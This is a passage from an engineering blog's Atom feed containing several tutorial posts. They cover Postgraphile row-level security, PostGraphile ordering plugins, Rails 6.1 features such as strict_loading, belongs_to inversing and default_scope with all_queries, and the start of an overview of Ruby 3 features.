    nodes {
      content
      creatorEmail
      visibilityType
    }
  }`,
  accessToken: &quot;***&quot;,
});</code></pre><p>In the <strong>server</strong>, we configure Postgraphile to pass the user information to the database.</p><pre><code class="language-js">export default postgraphile(DATABASE_URL, schemaName, {
  pgSettings: (req) =&gt; {
    const userEmail = findEmail(req.headers.authorization);
    return {
      current_user_email: userEmail,
    };
  },
});</code></pre><p>We can pass a function as Postgraphile's <a href="https://www.graphile.org/postgraphile/usage-library/#pgsettings-function">pgSettings</a> property, whose return value will be accessible from the connected Postgres database by calling the <code>current_setting</code> function.</p><p>In the <strong>database</strong>, row-level security policies can be defined to 
control the data access.</p><p><a href="https://www.postgresql.org/docs/12/ddl-rowsecurity.html">Row-level security policies</a> are basically just SQL expressions that evaluate to either true or false. If a policy is created and enabled for a table, that policy will be checked before doing an operation on the table.</p><pre><code class="language-pgsql">create policy blogs_policy_select
on public.blogs for select to users
USING (isPublished OR creator_email = current_setting('current_user_email'));

ALTER TABLE blogs ENABLE ROW LEVEL SECURITY;</code></pre><p>Here the policy named <em>blogs_policy_select</em> will be checked before selecting a row in the table <em>public.blogs</em>. A row will be selected only if the <em>isPublished</em> field is <em>true</em> or <em>creator_email</em> matches the current user's email.</p><p>Similarly, for creating, editing, and deleting blogs, we can have row-level security policies for INSERT, UPDATE, and DELETE operations on the table.</p><h2>Conclusion</h2><p>The REST implementation does the authorization at the server level, but Postgraphile does it at the database level. Each implementation has its own advantages and disadvantages, which is a topic for another day.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Sort query data on associated table in PostGraphile]]></title>
       <author><name>Taha Husain</name></author>
      <link href="https://www.bigbinary.com/blog/sort-query-data-on-associated-tables-in-postgraphile-using-order-by-plugin"/>
      <updated>2021-01-19T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/sort-query-data-on-associated-tables-in-postgraphile-using-order-by-plugin</id>
      <content type="html"><![CDATA[<p><a href="https://www.graphile.org/postgraphile/">PostGraphile</a> provides sorting on all columns of a table in a GraphQL query by default with the <code>orderBy</code> argument.</p><p>However, sorting based on an associated table's columns, or adding a custom sort, can be achieved via plugins. In this blog we will explore two such plugins.</p><h3>Using <code>pg-order-by-related</code> plugin</h3><p>The <a href="https://github.com/graphile-contrib/pg-order-by-related">pg-order-by-related</a> plugin allows us to sort query results based on an associated table's columns. It does that by adding enums for all of the associated table's columns. Here's what we need to do to use this plugin.</p><h4>Installation</h4><pre><code class="language-shell">npm i @graphile-contrib/pg-order-by-related</code></pre><h4>Adding the plugin</h4><pre><code class="language-javascript">const express = require(&quot;express&quot;);
const { postgraphile } = require(&quot;postgraphile&quot;);
const PgOrderByRelatedPlugin = require(&quot;@graphile-contrib/pg-order-by-related&quot;);

const app = express();

app.use(
  postgraphile(process.env.DATABASE_URL, &quot;public&quot;, {
    appendPlugins: [PgOrderByRelatedPlugin],
  })
);</code></pre><h4>Using associated table column enum with <code>orderBy</code> argument</h4><pre><code class="language-graphql">query getPostsSortedByUserId {
  posts: postsList(orderBy: AUTHOR_BY_USER_ID__NAME_ASC) {
    id
    title
    description
    author: authorByUserId {
      id
      name
    }
  }
}</code></pre><p>The <code>pg-order-by-related</code> plugin is useful only when we want to sort data based on a first-level association. 
If we want to apply <code>orderBy</code> on second-level table columns or deeper, we have to use <code>makeAddPgTableOrderByPlugin</code>.</p><h3>Using <code>makeAddPgTableOrderByPlugin</code></h3><p><a href="https://www.graphile.org/postgraphile/make-add-pg-table-order-by-plugin/">makeAddPgTableOrderByPlugin</a> allows us to add custom enums that are accessible on the specified table's <code>orderBy</code> argument. We can write our custom select queries using this plugin.</p><p>We will use a complex example to understand the use case of a custom <code>orderBy</code> enum.</p><p>In our posts list query, we want posts to be sorted by the author's address. Address has country, state and city columns. We want the list to be sorted by country, state and city, in that order.</p><p>Here's how we can achieve this using <code>makeAddPgTableOrderByPlugin</code>.</p><p><code>plugins/orderBy/orderByPostAuthorAddress.js</code></p><pre><code class="language-javascript">import { makeAddPgTableOrderByPlugin, orderByAscDesc } from &quot;graphile-utils&quot;;

export default makeAddPgTableOrderByPlugin(
  &quot;public&quot;,
  &quot;post&quot;,
  ({ pgSql: sql }) =&gt; {
    const author = sql.identifier(Symbol(&quot;author&quot;));
    const address = sql.identifier(Symbol(&quot;address&quot;));

    return orderByAscDesc(
      &quot;AUTHOR_BY_USER_ID__ADDRESS_ID__COUNTRY__STATE__CITY&quot;,
      ({ queryBuilder }) =&gt; sql.fragment`(
        SELECT
          CONCAT(
            ${address}.city,
            ', ',
            ${address}.state,
            ', ',
            ${address}.country
          ) AS full_address
        FROM public.user AS ${author}
        JOIN public.address ${address} ON ${author}.address_id = ${address}.id
        WHERE ${author}.id = ${queryBuilder.getTableAlias()}.user_id
        ORDER BY ${address}.country DESC, ${address}.state DESC, ${address}.city DESC
        LIMIT 1
      )`
    );
  }
);</code></pre><h4>Export all custom 
<code>orderBy</code> plugins</h4><p><code>plugins/orderBy/index.js</code></p><pre><code class="language-javascript">export { default as orderByPostAuthorAddress } from &quot;./orderByPostAuthorAddress&quot;;</code></pre><h4>Append custom <code>orderBy</code> plugins to <code>postgraphile</code></h4><pre><code class="language-javascript">const express = require(&quot;express&quot;);const { postgraphile } = require(&quot;postgraphile&quot;);import * as OrderByPlugins from &quot;./plugins/orderby&quot;;const app = express();app.use(  postgraphile(process.env.DATABASE_URL, &quot;public&quot;, {    appendPlugins: [...Object.values(OrderByPlugins)],  }));</code></pre><h4>Using custom enum with <code>orderBy</code> argument</h4><pre><code class="language-graphql">query getPostsSortedByAddress {  posts: postsList(    orderBy: AUTHOR_BY_USER_ID__ADDRESS_ID__COUNTRY__STATE__CITY  ) {    id    title    description    author: authorByUserId {      id      name      address {        id        country        state        city      }    }  }}</code></pre><p>Please head to<a href="https://github.com/graphile-contrib/pg-order-by-related">pg-order-by-related</a>and<a href="https://www.graphile.org/postgraphile/make-add-pg-table-order-by-plugin/">makeAddPgTableOrderByPlugin</a>pages for detailed documentation.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6.1 adds support for belongs_to to has_many inversing]]></title>
       <author><name>Siddharth Shringi</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-adds-support-for-belongs_to-to-has_many-inversing"/>
      <updated>2021-01-19T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-adds-support-for-belongs_to-to-has_many-inversing</id>
      <content type="html"><![CDATA[<p>Before Rails 6.1, we could only traverse the object chain in one direction - from has_many to belongs_to. Now we can traverse the chain bi-directionally.</p><p>The <code>inverse_of</code> option, both in <code>belongs_to</code> and <code>has_many</code>, is used to specify the name of the inverse association.</p><p>Let's see an example.</p><pre><code class="language-ruby">class Author &lt; ApplicationRecord
  has_many :books, inverse_of: :author
end

class Book &lt; ApplicationRecord
  belongs_to :author, inverse_of: :books
end</code></pre><h3>Before Rails 6.1</h3><h4>has_many to belongs_to inversing</h4><pre><code class="language-ruby">irb(main):001:0&gt; author = Author.new
irb(main):002:0&gt; book = author.books.build
irb(main):003:0&gt; author == book.author
=&gt; true</code></pre><p>In the above code, first we created the <code>author</code> and then a <code>book</code> instance through the <code>has_many</code> association.</p><p>In line 3, we traverse the object chain back to the author using the <code>belongs_to</code> association method on the book instance.</p><h4>belongs_to to has_many inversing</h4><pre><code class="language-ruby">irb(main):001:0&gt; book = Book.new
irb(main):002:0&gt; author = book.build_author
irb(main):003:0&gt; author.books
=&gt; #&lt;ActiveRecord::Associations::CollectionProxy []&gt;</code></pre><p>In the above case, we created the <code>book</code> instance and then we created the <code>author</code> instance using the method added by the <code>belongs_to</code> association.</p><p>But when we tried to traverse the object chain through the <code>has_many</code> association, we got an empty collection instead of one with the <code>book</code> instance.</p><h3>After changes in Rails 6.1</h3><p>The <code>belongs_to</code> inversing can now be traversed in the same way as the <code>has_many</code> inversing.</p><pre><code class="language-ruby">irb(main):001:0&gt; book = Book.new
irb(main):002:0&gt; author = book.build_author
irb(main):003:0&gt; author.books
=&gt; #&lt;ActiveRecord::Associations::CollectionProxy [#&lt;Book id: nil, author_id: nil, created_at: nil, updated_at: nil&gt;]&gt;</code></pre><p>Here we get the collection with the <code>book</code> instance instead of an empty collection.</p><p>We can also verify using a test.</p><pre><code class="language-ruby">class InverseTest &lt; ActiveSupport::TestCase
  def test_book_inverse_of_author
    author = Author.new
    book = author.books.build

    assert_equal book.author, author
  end

  def test_author_inverse_of_book
    book = Book.new
    author = book.build_author

    assert_includes author.books, book
  end
end</code></pre><p>In previous Rails versions, the test cases would fail.</p><pre><code class="language-shell"># Running:

.F

Failure:
InverseTest#test_author_inverse_of_book
Expected #&lt;ActiveRecord::Associations::CollectionProxy []&gt; to include #&lt;Book id: nil, author_id: nil, created_at: nil, updated_at: nil&gt;.

Finished in 0.292532s, 6.8369 runs/s, 10.2553 assertions/s.
2 runs, 3 assertions, 1 failures, 0 errors, 0 skips</code></pre><p>In Rails 6.1, both the tests will pass.</p><pre><code class="language-shell"># Running:

..

Finished in 0.317668s, 6.2959 runs/s, 9.4438 assertions/s.
2 runs, 3 assertions, 0 failures, 0 errors, 0 skips</code></pre><p>Check out this <a href="https://github.com/rails/rails/pull/34533">pull request</a> for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Additional database-specific rake tasks for multi-database users]]></title>
       <author><name>Amit Gupta</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-adds-additional-database-specific-tasks"/>
      <updated>2021-01-13T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-adds-additional-database-specific-tasks</id>
      <content type="html"><![CDATA[<p>Rails 6.1 provides additional tasks to work with a specific database when working in a multi-database setup.</p><p>Before Rails 6.1, only the following tasks worked on a specific database.</p><ul><li>rails db:migrate:primary</li><li>rails db:create:primary</li><li>rails db:drop:primary</li></ul><p>But some tasks that could be applied to a specific database were missing. Let's check out an example.</p><p>Before Rails 6.1, running a top-level migration on a multi-database project dumped the schema for all the configured databases, but if a database-specific migration was run, the schema was not dumped. And there were no tasks to manually dump the schema of a specific database.</p><pre><code class="language-shell">&gt; rails db:schema:dump:primary
rails aborted!
Don't know how to build task `db:schema:dump:primary` (See the list of available tasks with `rails --tasks`)
Did you mean?  db:schema:dump</code></pre><p>Therefore, in Rails 6.1, the following database-specific tasks were introduced.</p><ul><li>rails db:schema:dump:primary</li><li>rails db:schema:load:primary</li><li>rails db:test:prepare:primary</li></ul><p>Check out the <a href="https://github.com/rails/rails/pull/38449">pull request</a> for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6.1 adds strict_loading to warn lazy loading associations]]></title>
       <author><name>Dinesh Panda</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-adds-strict_loading-to-warn-lazy-loading-associations"/>
      <updated>2021-01-06T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-adds-strict_loading-to-warn-lazy-loading-associations</id>
      <content type="html"><![CDATA[<p>Rails 6.1 adds <code>strict_loading</code> mode which can be enabled per record,association, model or across the whole application.</p><p><code>strict_loading</code> mode is an optional setup and it helps in finding <code>N+1</code>queries.</p><p>Let's consider the following example.</p><pre><code class="language-ruby">class Article &lt; ApplicationRecord  has_many :commentsendclass Comment &lt; ApplicationRecord  belongs_to :articleend</code></pre><h4>Mark a record for strict_loading</h4><p>When <code>strict_loading</code> mode is enabled for a record then its associations have tobe eager loaded otherwise Rails raises<code>ActiveRecord::StrictLoadingViolationError</code>.</p><p>Let's see this use case by setting <code>strict_loading</code> mode for an <code>article</code>record.</p><pre><code class="language-ruby">2.7.2 :001 &gt; article = Article.strict_loading.first  Article Load (0.2ms)  SELECT &quot;articles&quot;.* FROM &quot;articles&quot; ORDER BY &quot;articles&quot;.&quot;id&quot; ASC LIMIT ?  [[&quot;LIMIT&quot;, 1]] =&gt; #&lt;Article id: 1, title: &quot;First article&quot;, content: &quot;First content&quot;, created_at: &quot;2020-12-01 07:23:38.446867000 +0000&quot;, updated_at: &quot;2020-12-01 07:23:38.446867000 +0000&quot;&gt;2.7.2 :002 &gt; article.strict_loading? 
=&gt; true2.7.2 :003 &gt; article.commentsTraceback (most recent call last):ActiveRecord::StrictLoadingViolationError (`Comment` called on `Article` is marked for strict_loading and cannot be lazily loaded.)</code></pre><p><code>strict_loading</code> mode forces us to eager load the associated comments by raisingthe <code>ActiveRecord::StrictLoadingViolationError</code> error.</p><p>Let's fix the <code>strict_loading</code> violation error.</p><pre><code class="language-ruby">2.7.2 :004 &gt; article = Article.includes(:comments).strict_loading.first  Article Load (0.7ms)  SELECT &quot;articles&quot;.* FROM &quot;articles&quot; ORDER BY &quot;articles&quot;.&quot;id&quot; ASC LIMIT ?  [[&quot;LIMIT&quot;, 1]]  Comment Load (0.2ms)  SELECT &quot;comments&quot;.* FROM &quot;comments&quot; WHERE &quot;comments&quot;.&quot;article_id&quot; = ?  [[&quot;article_id&quot;, 1]] =&gt; #&lt;Article id: 1, title: &quot;First article&quot;, content: &quot;First content&quot;, created_at: &quot;2020-12-01 07:23:38.446867000 +0000&quot;, updated_at: &quot;2020-12-01 07:23:38.446867000 +0000&quot;&gt;2.7.2 :005 &gt; article.comments =&gt; #&lt;ActiveRecord::Associations::CollectionProxy [#&lt;Comment id: 1, desc: &quot;Great article&quot;, article_id: 1, created_at: &quot;2020-12-01 07:23:58.832869000 +0000&quot;, updated_at: &quot;2020-12-01 07:23:58.832869000 +0000&quot;&gt;  , #&lt;Comment id: 2, desc: &quot;Well written&quot;, article_id: 1, created_at: &quot;2020-12-01 07:24:02.853376000 +0000&quot;, updated_at: &quot;2020-12-01 07:24:02.853376000 +0000&quot;&gt;]&gt;</code></pre><p><code>strict_loading</code> mode on <code>article</code> record automatically sets <code>strict_loading</code>mode for all the associated <code>comments</code> as well.</p><p>Let's verify this in Rails console.</p><pre><code class="language-ruby">2.7.2 :006 &gt; article.comments.all?(&amp;:strict_loading?) 
=&gt; true</code></pre><h4>Mark an association for strict_loading</h4><p><code>strict_loading</code> mode can be set up for a specific association.</p><p>Let's update our example to see <code>strict_loading</code> in action when it is passed asan option to associations.</p><pre><code class="language-ruby">class Article &lt; ApplicationRecord  has_many :comments, strict_loading: trueendclass Comment &lt; ApplicationRecord  belongs_to :articleend</code></pre><p>Let's verify this in Rails console.</p><pre><code class="language-ruby">2.7.2 :001 &gt; article = Article.first  Article Load (0.2ms)  SELECT &quot;articles&quot;.* FROM &quot;articles&quot; ORDER BY &quot;articles&quot;.&quot;id&quot; ASC LIMIT ?  [[&quot;LIMIT&quot;, 1]] =&gt; #&lt;Article id: 1, title: &quot;First article&quot;, content: &quot;First content&quot;, created_at: &quot;2020-12-01 07:23:38.446867000 +0000&quot;, updated_at: &quot;2020-12-01 07:23:38.446867000 +0000&quot;&gt;2.7.2 :002 &gt; article.strict_loading? =&gt; false2.7.2 :003 &gt; article.commentsTraceback (most recent call last):ActiveRecord::StrictLoadingViolationError (`comments` called on `Article` is marked for strict_loading and cannot be lazily loaded.)2.7.2 :004 &gt; article = Article.includes(:comments).first  Article Load (0.2ms)  SELECT &quot;articles&quot;.* FROM &quot;articles&quot; ORDER BY &quot;articles&quot;.&quot;id&quot; ASC LIMIT ?  [[&quot;LIMIT&quot;, 1]]  Comment Load (0.2ms)  SELECT &quot;comments&quot;.* FROM &quot;comments&quot; WHERE &quot;comments&quot;.&quot;article_id&quot; = ?  
[[&quot;article_id&quot;, 1]] =&gt; #&lt;Article id: 1, title: &quot;First article&quot;, content: &quot;First content&quot;, created_at: &quot;2020-12-01 07:23:38.446867000 +0000&quot;, updated_at: &quot;2020-12-01 07:23:38.446867000 +0000&quot;&gt;2.7.2 :005 &gt; article.comments =&gt; #&lt;ActiveRecord::Associations::CollectionProxy [#&lt;Comment id: 1, desc: &quot;Great article&quot;, article_id: 1, created_at: &quot;2020-12-01 07:23:58.832869000 +0000&quot;, updated_at: &quot;2020-12-01 07:23:58.832869000 +0000&quot;&gt;, #&lt;Comment id: 2, desc: &quot;Well written&quot;, article_id: 1, created_at: &quot;2020-12-01 07:24:02.853376000 +0000&quot;, updated_at: &quot;2020-12-01 07:24:02.853376000 +0000&quot;&gt;]&gt;</code></pre><h4>Configure strict_loading per model</h4><p>We can set <code>strict_loading_by_default</code> option per model to mark all of itsrecords and associations for <code>strict_loading</code>.</p><p>Let's update our example to set <code>strict_loading_by_default</code> for the <code>Article</code>model.</p><pre><code class="language-ruby">class Article &lt; ApplicationRecord  self.strict_loading_by_default = true  has_many :commentsendclass Comment &lt; ApplicationRecord  belongs_to :articleend</code></pre><p>Let's verify this setting in the <code>Article</code> model.</p><pre><code class="language-ruby">2.7.2 :001 &gt; article = Article.includes(:comments).first  Article Load (0.2ms)  SELECT &quot;articles&quot;.* FROM &quot;articles&quot; ORDER BY &quot;articles&quot;.&quot;id&quot; ASC LIMIT ?  [[&quot;LIMIT&quot;, 1]]  Comment Load (0.2ms)  SELECT &quot;comments&quot;.* FROM &quot;comments&quot; WHERE &quot;comments&quot;.&quot;article_id&quot; = ?  [[&quot;article_id&quot;, 1]] =&gt; #&lt;Article id: 1, title: &quot;First article&quot;, content: &quot;First content&quot;, created_at: &quot;2020-12-01 07:23:38.446867000 +0000&quot;, updated_at: &quot;2020-12-01 07:23:38.446867000 +0000&quot;&gt;2.7.2 :002 &gt; article.strict_loading? 
=&gt; true2.7.2 :003 &gt; article.comments.all?(&amp;:strict_loading?) =&gt; false2.7.2 :004 &gt; article.comments =&gt; #&lt;ActiveRecord::Associations::CollectionProxy [#&lt;Comment id: 1, desc: &quot;Great article&quot;, article_id: 1, created_at: &quot;2020-12-01 07:23:58.832869000 +0000&quot;, updated_at: &quot;2020-12-01 07:23:58.832869000 +0000&quot;&gt;, #&lt;Comment id: 2, desc: &quot;Well written&quot;, article_id: 1, created_at: &quot;2020-12-01 07:24:02.853376000 +0000&quot;, updated_at: &quot;2020-12-01 07:24:02.853376000 +0000&quot;&gt;]&gt;</code></pre><h4>Make strict_loading default across all models</h4><p>We can make <code>strict_loading</code> default across all models by adding the followingline to the Rails configuration file.</p><pre><code class="language-ruby">config.active_record.strict_loading_by_default = true</code></pre><hr><h2>Configure strict_loading violations to show only in logs</h2><p>By default, associations marked for strict loading always raise<code>ActiveRecord::StrictLoadingViolationError</code> for lazy loading.</p><p>However, we may prefer to log such violations in our <code>production</code> environmentinstead of raising errors.</p><p>We can add the following line to the environment configuration file.</p><pre><code class="language-ruby">config.active_record.action_on_strict_loading_violation = :log</code></pre><p>Check out pull requests <a href="https://github.com/rails/rails/pull/37400">#37400</a>,<a href="https://github.com/rails/rails/pull/38541">#38541</a>,<a href="https://github.com/rails/rails/pull/39491">#39491</a> and<a href="https://github.com/rails/rails/pull/40511">#40511</a> for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6.1 allows default_scope to be run on all queries]]></title>
       <author><name>Unnikrishnan KP</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-allows-default_scope-to-be-run-on-all-queries"/>
      <updated>2020-12-29T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-allows-default_scope-to-be-run-on-all-queries</id>
      <content type="html"><![CDATA[<p>Before Rails 6.1, if a <code>default_scope</code> was defined in a model, it would be applied only to <code>select</code> and <code>insert</code> queries. Rails 6.1 adds an option <code>all_queries: true</code> that can be passed to <code>default_scope</code> to make the scope apply to all queries.</p><pre><code class="language-ruby">default_scope -&gt; { where(...) }, all_queries: true</code></pre><p>Consider the Article class below.</p><pre><code class="language-ruby">class Article &lt; ApplicationRecord
  default_scope -&gt; { where(organization_id: Current.organization_id) }
end

@article.update title: &quot;Hello World&quot;
@article.delete</code></pre><p>The <code>update</code> and <code>delete</code> methods would generate SQL queries as shown below. As we can see, the <code>default_scope</code> condition is missing from these queries.</p><pre><code class="language-sql">UPDATE &quot;articles&quot; SET &quot;title&quot; = $1 WHERE &quot;articles&quot;.&quot;id&quot; = $2 [[&quot;title&quot;, &quot;Hello World&quot;], [&quot;id&quot;, 146]]

DELETE FROM &quot;articles&quot; WHERE &quot;articles&quot;.&quot;id&quot; = $1  [[&quot;id&quot;, 146]]</code></pre><p>In Rails 6.1 we can solve this problem by passing <code>all_queries: true</code> to the <code>default_scope</code>.</p><pre><code class="language-ruby">class Article &lt; ApplicationRecord
  default_scope -&gt; { where(organization_id: Current.organization_id) }, all_queries: true
end</code></pre><p>Then the generated SQL changes to this:</p><pre><code class="language-sql">UPDATE &quot;articles&quot; SET &quot;title&quot; = $1 WHERE &quot;articles&quot;.&quot;id&quot; = $2 AND &quot;articles&quot;.&quot;organization_id&quot; = $3  [[&quot;title&quot;, &quot;Hello World&quot;], [&quot;id&quot;, 146], [&quot;organization_id&quot;, 314]]

DELETE FROM &quot;articles&quot; WHERE &quot;articles&quot;.&quot;id&quot; = $1 AND &quot;articles&quot;.&quot;organization_id&quot; = $2  [[&quot;id&quot;, 146], [&quot;organization_id&quot;, 314]]</code></pre><p>The ability to make default_scopes applicable to all queries is particularly useful in the case of multi-tenanted applications, where an <code>organization_id</code> or <code>repository_id</code> is added to the tables to support sharding.</p><p>Check out the <a href="https://github.com/rails/rails/pull/40720">pull request</a> for more details on this feature.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 3 is released - The list of Ruby 3 features]]></title>
       <author><name>Datt Dongare</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-3-features"/>
      <updated>2020-12-25T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-3-features</id>
      <content type="html"><![CDATA[<p>For all Rubyists, <strong>2020</strong> was a special year. Why wouldn't it be? Ruby 2 was released in 2013. We have been using Ruby 2.x for almost 7 years, and we have been waiting to see Ruby 3 get released. Finally, the wait is over. <a href="https://www.ruby-lang.org/en/news/2020/12/25/ruby-3-0-0-released/">Ruby 3.0.0 has been released</a>. It's time to unwrap the gift box and see all the Ruby 3 features we got.</p><h2>Ruby 3 major updates</h2><p>The number <strong>3</strong> is very significant in the Ruby 3 release, be it the release version number, making performance 3x faster, or the trio of core contributors (Matz, TenderLove, Koichi). There were 3 major goals of Ruby 3: being faster, having better concurrency, and ensuring correctness.</p><p><img src="/blog_images/2020/ruby-3-features/ruby-3-features.jpg" alt="Ruby 3 features"></p><h3>1. Ruby 3 performance</h3><p>One of the major focuses for Ruby 3 was performance. In fact, the initial discussion for Ruby 3 started around it. Matz had set a very ambitious goal of making Ruby 3 times faster.</p><h4>What is Ruby 3x3?</h4><p>Before discussing this, let's revisit Ruby's core philosophy.</p><blockquote><p>&quot;I hope to see Ruby help every programmer in the world to be productive, and to enjoy programming, and to be happy.&quot; - Matz</p></blockquote><p>About Ruby 3x3, some asked whether the goal was to make Ruby the fastest language. The answer is no. The main goal of Ruby 3x3 was to make Ruby 3 times faster than Ruby 2.</p><blockquote><p>No language is fast enough. - Matz</p></blockquote><p>Ruby was not designed to be the fastest, and if that had been the goal, Ruby wouldn't be the same as it is today. As the Ruby language gets a performance boost, our applications definitely become faster and more scalable.</p><blockquote><p>&quot;In the design of the Ruby language we have been primarily focused on productivity and the joy of programming. 
As a result, Ruby was too slow.&quot; - Matz</p></blockquote><p>There are two areas where performance can be measured: memory and CPU.</p><h4>CPU optimization</h4><p>Some enhancements have been made in Ruby internals to improve speed. The Ruby team has optimized the JIT (Just In Time) compiler from previous versions. The <a href="https://bigbinary.com/blog/mjit-support-in-ruby-2-6">Ruby MJIT compiler</a> was first introduced in Ruby 2.6. Ruby 3 MJIT comes with better security and seems to improve web application performance to a greater extent.</p><p><img src="/blog_images/2020/ruby-3-features/machine-performance.jpg" alt="CPU optimization"></p><p>The MJIT implementation is different from the usual JIT. When methods get called repeatedly, e.g. 10,000 times, MJIT picks the methods which can be compiled into native code and puts them into a queue. Later, MJIT fetches methods from the queue and converts them to native code.</p><p>Please check <a href="https://engineering.appfolio.com/appfolio-engineering/2019/7/18/jit-and-rubys-mjit">JIT vs MJIT</a> for more details.</p><h4>Memory optimization</h4><p>Ruby 3 comes with an enhanced garbage collector. It has a Python-buffer-like API which helps in better memory utilization. Ruby's <a href="https://scoutapm.com/blog/ruby-garbage-collection">garbage collection</a> algorithms have continuously evolved since Ruby 1.8.</p><h5>Automatic Garbage Compaction</h5><p>The latest change in garbage collection is <a href="https://engineering.appfolio.com/appfolio-engineering/2019/3/22/ruby-27-and-the-compacting-garbage-collector">Garbage Compaction</a>. It was introduced in Ruby 2.7, where the process was somewhat manual. In version 3 it is fully automatic: the compactor is invoked at appropriate times to ensure proper memory utilization.</p><h5>Objects Grouping</h5><p>The garbage compactor moves objects in the heap. 
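</p><p>Compaction can also be controlled directly from Ruby code. The following is a minimal sketch, assuming Ruby 3.0 or newer (where the <code>GC.auto_compact</code> toggle was added):</p><pre><code class="language-ruby"># Enable automatic compaction as part of major GC runs (Ruby 3.0+).
GC.auto_compact = true

# Compaction can also be triggered manually. GC.compact returns a
# stats hash describing which objects were considered and moved.
stats = GC.compact
p stats.class
</code></pre><p>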
It groups dispersed objects together at a single place in memory so that this memory can be used even by heavier objects later.</p><p><img src="/blog_images/2020/ruby-3-features/binary-background.jpg" alt="Memory optimization"></p><h3>2. Parallelism and Concurrency in Ruby 3</h3><p>Concurrency is one of the important aspects of any programming language. Matz feels that Threads are not the right level of abstraction for Ruby programmers to use.</p><blockquote><p>I regret adding Threads. - Matz</p></blockquote><p>Ruby 3 makes it a lot easier to build applications where concurrency is a major focus. Several features and improvements related to concurrency were added in Ruby 3.</p><h4>Fibers</h4><p>Fibers are considered a disruptive addition in Ruby 3. Fibers are lightweight workers which look like Threads but have some advantages. They consume less memory than Threads and give the programmer greater control, defining code segments that can be paused or resumed, resulting in better I/O handling.</p><p>The <a href="https://github.com/socketry/falcon">Falcon Rack web server</a> uses async Fibers internally. This allows Falcon to not block on I/O. Asynchronously managing I/O gives a great uplift to the Falcon server, letting it serve requests concurrently.</p><h5>Fiber Scheduler</h5><p><a href="https://bugs.ruby-lang.org/issues/16786">Fiber Scheduler</a> is an experimental feature added in Ruby 3. It was introduced to intercept blocking operations such as I/O. The best thing is that it allows lightweight concurrency and can easily integrate into an existing codebase without changing the original logic. It's an interface that can be implemented by creating a wrapper for a gem like <code>EventMachine</code> or <code>Async</code>. 
This interface design allows separation of concerns between the event loop implementation and the application code.</p><p>Following is an example that sends multiple <code>HTTP</code> requests concurrently using <code>Async</code>.</p><pre><code class="language-ruby">require 'async'
require 'net/http'
require 'uri'

LINKS = [
  'https://bigbinary.com',
  'https://basecamp.com'
]

Async do
  LINKS.each do |link|
    Async do
      Net::HTTP.get(URI(link))
    end
  end
end
</code></pre><p>Please check <a href="https://github.com/ruby/ruby/blob/master/doc/fiber.md">fibers</a> for more details.</p><h4>Ractors (Guilds)</h4><p>As we know, Ruby's global <code>VM lock (GVL)</code> prevents most Ruby Threads from computing in parallel. <a href="https://github.com/ruby/ruby/blob/master/doc/ractor.md">Ractors</a> work around the <code>GVL</code> to offer better parallelism. Ractor is an Actor-Model-like concurrency abstraction designed to provide parallel execution without thread-safety concerns.</p><p>Ractors allow Threads in different Ractors to compute at the same time. Each Ractor has at least one thread, which may contain multiple fibers. Within a Ractor, only a single thread is allowed to execute at a given time.</p><p>The following program computes the square roots of two really large numbers, calculating both results in parallel.</p><pre><code class="language-ruby"># Math.sqrt(number) in ractor1 and ractor2 runs in parallel
ractor1, ractor2 = *(1..2).map do
  Ractor.new do
    number = Ractor.receive
    Math.sqrt(number)
  end
end

# send parameters
ractor1.send 3**71
ractor2.send 4**51

p ractor1.take #=&gt; 8.665717809264115e+16
p ractor2.take #=&gt; 2.251799813685248e+15
</code></pre><h3>3. Static Analysis</h3><p>We need tests to ensure the correctness of our programs. However, by its very nature, testing can mean code duplication.</p><blockquote><p>I hate tests because they aren't DRY. 
- Matz</p></blockquote><p>To ensure the correctness of a program, static analysis can be a great tool in addition to tests.</p><p>Static analysis usually relies on inline type annotations, which aren't DRY. The solution to this challenge is having <code>.rbs</code> files parallel to our <code>.rb</code> files.</p><h4>RBS</h4><p>RBS is a language to describe the structure of a Ruby program. It provides an overview of the program and how the classes, methods, etc. are defined. Using RBS, we can write definitions for Ruby classes, modules, methods, instance variables, variable types, and inheritance. It supports commonly used patterns in Ruby code, and advanced types like unions and duck typing.</p><p>The <code>.rbs</code> files are similar to <code>.d.ts</code> files in TypeScript. Following is a small example of what a <code>.rbs</code> file looks like. The advantage of having a type definition is that it can be validated against both implementation and execution.</p><p>The below example is pretty self-explanatory. One thing worth noting, though: <code>each_post</code> accepts a block or returns an enumerator.</p><pre><code class="language-ruby"># user.rbs
class User
  attr_reader name: String
  attr_reader email: String
  attr_reader age: Integer
  attr_reader posts: Array[Post]

  def initialize: (name: String,
                   email: String,
                   age: Integer) -&gt; void

  def each_post: () { (Post) -&gt; void } -&gt; void
               | () -&gt; Enumerator[Post, void]
end
</code></pre><p>Please check the <a href="https://github.com/ruby/rbs">RBS gem documentation</a> for more details.</p><h4>Typeprof</h4><p>Introducing type definitions was a challenge because there is already a lot of existing Ruby code around, and we need a tool that can automatically generate the type signatures. Typeprof is a type analysis tool that reads plain Ruby code and generates a prototype of the type signature in RBS format by analyzing the methods and their usage. 
Typeprof is an experimental feature. Right now only a small subset of Ruby is supported.</p><blockquote><p>Ruby is simple in appearance, but is very complex inside, just like our human body. - Matz</p></blockquote><p>Let's see an example.</p><pre><code class="language-ruby"># user.rb
class User
  def initialize(name:, email:, age:)
    @name, @email, @age = name, email, age
  end

  attr_reader :name, :email, :age
end

User.new(name: &quot;John Doe&quot;, email: 'john@example.com', age: 23)
</code></pre><p>Output</p><pre><code class="language-ruby">$ typeprof user.rb
# Classes
class User
  attr_reader name : String
  attr_reader email : String
  attr_reader age : Integer
  def initialize : (name: String,
